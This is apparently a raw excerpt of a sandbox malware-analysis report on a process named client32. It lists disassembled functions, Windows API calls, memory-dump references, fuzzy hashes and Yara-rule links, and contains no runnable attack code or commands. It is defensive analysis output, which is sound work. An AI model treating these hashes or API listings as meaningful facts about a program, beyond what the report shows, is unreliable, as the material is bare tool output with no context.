                                                                                                • Opcode ID: f33af23a078070d7378676cb4c73ffb7aab0aed87268a410d672eab19d22977f
                                                                                                • Instruction ID: 4a008aeae3466cd00315ede1b726beb55f33778c254b7696573bc970ae144bd8
                                                                                                • Opcode Fuzzy Hash: f33af23a078070d7378676cb4c73ffb7aab0aed87268a410d672eab19d22977f
                                                                                                • Instruction Fuzzy Hash: AF114CB5C04209AFEF50CFA0D9057AEBBF4FF09304F0080BAD60AE6640E7795A54DBA1
                                                                                                Function 11143070 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • SetBkColor.GDI32(?,?), ref: 11143091
                                                                                                • SetRect.USER32 ref: 111430A9
                                                                                                • ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 111430C0
                                                                                                • SetBkColor.GDI32(?,00000000), ref: 111430C8
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Color$RectText
                                                                                                • String ID:
                                                                                                • API String ID: 4034337308-0
                                                                                                • Opcode ID: 26f6cc05d1df662940a62fe5a538b52049d671c1388398b7ccd782556aa038f2
                                                                                                • Instruction ID: e9225e88152d902865c43eb673e3150d6d7e7d22167fd17714d79550e5345a2a
                                                                                                • Opcode Fuzzy Hash: 26f6cc05d1df662940a62fe5a538b52049d671c1388398b7ccd782556aa038f2
                                                                                                • Instruction Fuzzy Hash: 0C012C7264021CBBDB04DEA8DD81FEFB3ACEF49604F104159FA15A7280DAB0AD018BA5
                                                                                                Function 110675A0 Relevance: 6.0, APIs: 4, Instructions: 48windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • SetEvent.KERNEL32 ref: 110675BB
                                                                                                • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 110675EC
                                                                                                • DispatchMessageA.USER32(?), ref: 110675F6
                                                                                                • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 11067604
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Message$Peek$DispatchEvent
                                                                                                • String ID:
                                                                                                • API String ID: 4257095537-0
                                                                                                • Opcode ID: 3db10011ce53d706413e1f321e5ef86fa62babbb723f360e03787fab8b25e9f7
                                                                                                • Instruction ID: aec9ad63bee144445ad482119ba180fbd35a23c038e7556534d76a428b5108da
                                                                                                • Opcode Fuzzy Hash: 3db10011ce53d706413e1f321e5ef86fa62babbb723f360e03787fab8b25e9f7
                                                                                                • Instruction Fuzzy Hash: E701B171A40205ABE704DE94CC81F96B7ADAB88714F5001A5FA14AF1C5EBB5A541CBF0
                                                                                                Function 69CFC170 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 69CFC190
                                                                                                • _malloc.LIBCMT ref: 69CFC199
                                                                                                  • Part of subcall function 69D01B69: __FF_MSGBANNER.LIBCMT ref: 69D01B82
                                                                                                  • Part of subcall function 69D01B69: __NMSG_WRITE.LIBCMT ref: 69D01B89
                                                                                                  • Part of subcall function 69D01B69: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,69D0D3C1,69D06E81,00000001,69D06E81,?,69D0F447,00000018,69D27738,0000000C,69D0F4D7), ref: 69D01BAE
                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 69CFC1B0
                                                                                                  • Part of subcall function 69CFBA20: __strdup.LIBCMT ref: 69CFBA3A
                                                                                                • _free.LIBCMT ref: 69CFC1C2
                                                                                                  • Part of subcall function 69D01BFD: HeapFree.KERNEL32(00000000,00000000), ref: 69D01C13
                                                                                                  • Part of subcall function 69D01BFD: GetLastError.KERNEL32(00000000), ref: 69D01C25
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ByteCharHeapMultiWide$AllocateErrorFreeLast__strdup_free_malloc
                                                                                                • String ID:
                                                                                                • API String ID: 2344877359-0
                                                                                                • Opcode ID: 08164a0acd0f77ba21052801eb4545a1b35d61c7ea511e0d9970b780758e392e
                                                                                                • Instruction ID: 194b7c925c36cef552b5d49a057f09d6dcb407955233599f2d977208ea2404f5
                                                                                                • Opcode Fuzzy Hash: 08164a0acd0f77ba21052801eb4545a1b35d61c7ea511e0d9970b780758e392e
                                                                                                • Instruction Fuzzy Hash: 1AF0E9753452143BF52047459C46F6B765CCB87B75F304225FB18AA2C0E6F07D0042B9
                                                                                                Function 69CE5B30 Relevance: 6.0, APIs: 4, Instructions: 36COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • EnterCriticalSection.KERNEL32(69D2B898), ref: 69CE5B45
                                                                                                • LeaveCriticalSection.KERNEL32(69D2B898), ref: 69CE5B76
                                                                                                • SetEvent.KERNEL32(00000180), ref: 69CE5B8E
                                                                                                • LeaveCriticalSection.KERNEL32(69D2B898), ref: 69CE5B99
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$Leave$EnterEvent
                                                                                                • String ID:
                                                                                                • API String ID: 3394196147-0
                                                                                                • Opcode ID: 6fc453f90b27fa59b089f688b447d5d3fd06f236d7f4fc341c8b3d05bc818872
                                                                                                • Instruction ID: 40d53e6213552076cbabeab02768e4d57edf63d7ee1e70a8e8aab299f96baa59
                                                                                                • Opcode Fuzzy Hash: 6fc453f90b27fa59b089f688b447d5d3fd06f236d7f4fc341c8b3d05bc818872
                                                                                                • Instruction Fuzzy Hash: 3EF0C2764045D1AFFF109BA4D6046997B74F7033A1340C4B6EB9FAB981E364E844CBA0
                                                                                                Function 69CE5AC0 Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • EnterCriticalSection.KERNEL32(69D2B898), ref: 69CE5AD0
                                                                                                • _memmove.LIBCMT ref: 69CE5AEC
                                                                                                • _memmove.LIBCMT ref: 69CE5B0A
                                                                                                • LeaveCriticalSection.KERNEL32(69D2B898), ref: 69CE5B17
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CriticalSection_memmove$EnterLeave
                                                                                                • String ID:
                                                                                                • API String ID: 324922381-0
                                                                                                • Opcode ID: c1cddd912b801fd30ab830a2d1d20e8d5004bccab2df52b10cd8b74f71bc738f
                                                                                                • Instruction ID: b91172843e695cbe0ec5f47851cc1dfbf3429fdbd04769112ba9042ff6864243
                                                                                                • Opcode Fuzzy Hash: c1cddd912b801fd30ab830a2d1d20e8d5004bccab2df52b10cd8b74f71bc738f
                                                                                                • Instruction Fuzzy Hash: B6F05E796001906BBE109B64D981D2AB7A8EB87744308C438EA4AC7B80D665EC808BE0
                                                                                                Function 11007255 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                                  • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                                  • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                                • CreateWindowExA.USER32 ref: 110073A7
                                                                                                • SetFocus.USER32 ref: 11007403
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CreateFocusWindow_malloc_memsetwsprintf
                                                                                                • String ID: edit
                                                                                                • API String ID: 1305092643-2167791130
                                                                                                • Opcode ID: fe1d9a583002deeef45d3358319bd8db1ff8a03c045e33a600194c0dd1900ef0
                                                                                                • Instruction ID: e81607fb03d3f2f95005a1d43bd356d739516b9639758e6caabf034df3046c31
                                                                                                • Opcode Fuzzy Hash: fe1d9a583002deeef45d3358319bd8db1ff8a03c045e33a600194c0dd1900ef0
                                                                                                • Instruction Fuzzy Hash: A2519FB5A00606AFE715CF64DC81BAFB7E5FB88354F118569E955C7340EB34AA02CB60
                                                                                                Function 69CF0DC0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 69CFDBD0: _malloc.LIBCMT ref: 69CFDBE9
                                                                                                  • Part of subcall function 69CFDBD0: wsprintfA.USER32 ref: 69CFDC04
                                                                                                  • Part of subcall function 69CFDBD0: _memset.LIBCMT ref: 69CFDC27
                                                                                                • std::exception::exception.LIBCMT ref: 69CF0EEB
                                                                                                • __CxxThrowException@8.LIBCMT ref: 69CF0F00
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
                                                                                                • String ID: PIN
                                                                                                • API String ID: 1338273076-589459321
                                                                                                • Opcode ID: 9da7a1acef485b7718b3f366c4bc0f391697cf6bfbe05e9921074bb7d3d1f061
                                                                                                • Instruction ID: c63ff2ad1188352b25813da349ca1d4b350ffd8b113c46b482f4ee28df6d94ff
                                                                                                • Opcode Fuzzy Hash: 9da7a1acef485b7718b3f366c4bc0f391697cf6bfbe05e9921074bb7d3d1f061
                                                                                                • Instruction Fuzzy Hash: E54119B5D00248AFDB40DFE4E980AAEBBB4FF49714F50853AE51AA7640F7345A09CB50
                                                                                                Function 69CEFB60 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 69CEFBD5
                                                                                                • _memmove.LIBCMT ref: 69CEFC26
                                                                                                  • Part of subcall function 69CEF470: std::_Xinvalid_argument.LIBCPMT ref: 69CEF48A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Xinvalid_argumentstd::_$_memmove
                                                                                                • String ID: string too long
                                                                                                • API String ID: 2168136238-2556327735
                                                                                                • Opcode ID: ea5097d6dd6ad5bce0f82eb57127bfa8bc0eda89acc2221db1ca705e9af6281a
                                                                                                • Instruction ID: 7c42ca986c15551673528a79e90830ab8d5628f5df5b74087301c74f50bab2bc
                                                                                                • Opcode Fuzzy Hash: ea5097d6dd6ad5bce0f82eb57127bfa8bc0eda89acc2221db1ca705e9af6281a
                                                                                                • Instruction Fuzzy Hash: B831B3367046105FE324CF5CB8A0A5AFBE9FB95764B204A2BF583C7690E7619C8093A1
                                                                                                Function 11009270 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 110092E5
                                                                                                • _memmove.LIBCMT ref: 11009336
                                                                                                  • Part of subcall function 11008DD0: std::_Xinvalid_argument.LIBCPMT ref: 11008DEA
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Xinvalid_argumentstd::_$_memmove
                                                                                                • String ID: string too long
                                                                                                • API String ID: 2168136238-2556327735
                                                                                                • Opcode ID: 22491d451eb23d87cec3ea30fc5d884b072beb3f123d3bfee90730829ce68beb
                                                                                                • Instruction ID: dd3894f676f01ff6a75acb4aa2435548b18b289b65f075ee81d5ee4d5d084719
                                                                                                • Opcode Fuzzy Hash: 22491d451eb23d87cec3ea30fc5d884b072beb3f123d3bfee90730829ce68beb
                                                                                                • Instruction Fuzzy Hash: 8C31DB72B046108BF720DE9DE88099EF7EDEB957B4B20491FE589C7680E771AC4087A0
                                                                                                Function 110E1260 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Xinvalid_argument_memmovestd::_
                                                                                                • String ID: string too long
                                                                                                • API String ID: 256744135-2556327735
                                                                                                • Opcode ID: f63589a1e1e49e26468f6bc49513f74121357c805117a5e251a3e538b8b1e039
                                                                                                • Instruction ID: 4942d9d917c342fdb8aca387283afa0bcd15718542992abc979dc690a8db670a
                                                                                                • Opcode Fuzzy Hash: f63589a1e1e49e26468f6bc49513f74121357c805117a5e251a3e538b8b1e039
                                                                                                • Instruction Fuzzy Hash: 7931B372B152058F8724DE9EEC848EEF7EAEFD57613104A1FE442C7640DB31AC5187A1
                                                                                                Function 1103B150 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • _calloc.LIBCMT ref: 1103B162
                                                                                                • _free.LIBCMT ref: 1103B25B
                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorExitLastMessageProcess_calloc_freewsprintf
                                                                                                • String ID: CLTCONN.CPP
                                                                                                • API String ID: 183652615-2872349640
                                                                                                • Opcode ID: 8337f5e747ebaeb2686f90dd4bebe07236585bab06edcc3415c76220b6505581
                                                                                                • Instruction ID: 20d7259e8fe77d3daff0af84d5ff1d15e913130fc2269d1c6afd747bd8efee53
                                                                                                • Opcode Fuzzy Hash: 8337f5e747ebaeb2686f90dd4bebe07236585bab06edcc3415c76220b6505581
                                                                                                • Instruction Fuzzy Hash: F231C875A10B069AD310CF95C881BB7F3E4FF44318F048669E9598B641F774F905C3A5
                                                                                                Function 69CE79C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free
                                                                                                • String ID: DATA
                                                                                                • API String ID: 269201875-2607161047
                                                                                                • Opcode ID: 34b9f969c4d19c0e7baf2dd3f37f97cf9b60c30be318a93855af6e654d3a9457
